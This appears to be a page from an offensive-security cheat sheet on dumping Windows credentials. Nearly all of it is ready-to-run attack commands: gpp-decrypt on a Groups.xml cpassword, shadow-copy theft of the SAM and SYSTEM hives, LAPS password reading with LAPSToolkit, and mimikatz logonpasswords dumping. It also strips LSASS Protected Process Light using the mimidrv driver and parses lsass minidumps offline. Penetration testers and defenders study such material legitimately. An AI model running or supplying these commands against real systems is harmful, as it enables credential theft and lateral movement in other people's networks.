Credential Dumping
cpassword
Groups.xml --- Less likely to run into this on a modern environment as they stopped doing this in 2012.
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeX

SAM Database Dump
wmic shadowcopy call create Volume='C:\'
vssadmin list shadows

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\users\myhackingblog\sam
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\myhackingblog\system



Windows Local Administrator Password Solution (LAPS)
Import-Module .\LAPSToolkit.ps1
Get-LAPSComputers
Find-LAPSDelegatedGroups
Get-NetGroupMember -GroupName "LAPS Password Readers"
## Gain access to a user in the LAPS Password Readers Group and procede to dump the password.
runas /noprofile /user:domain\user "powershell -exec bypass"
Import-Module .\LAPSToolkit.ps1
Get-LAPSComputer


LSA Hash Dump (NTLM or Plaintext) Using Mimikatz
mimikatz.exe ## As an administrator
privilege::debug ## Anything other than a 20 likely implies your being blocked or not admin.
sekurlsa::logonpasswords

Local Security Authority Server Service (LSASS) can enable a Local Security Authority protection called Protected Process Light (PPL). When this is enabled not even a process running at system level integrity can dump logon passwords/hashes.
This attribute is set in the following registry and is enforced by a bit in the EPROCESS kernel object.
Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa

Fortunately for us mimikatz already has a built in bypass for this. This is done by using it's mimidrv.sys driver and already having local Administrator or System level permissions. High/System level is needed in order to use the SeLoadDriverPrivilege required to load signed drivers.
mimikatz.exe
!+
!processprotect /process:lsass.exe /remove
sekurlsa::logonpasswords

It's also possible to retrieve the hash without utilizing mimikatz on the victim computer by dumping the lsass processes using the task manager and opening the dump file on a local attacker controlled windows computer.
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
Last updated
Was this helpful?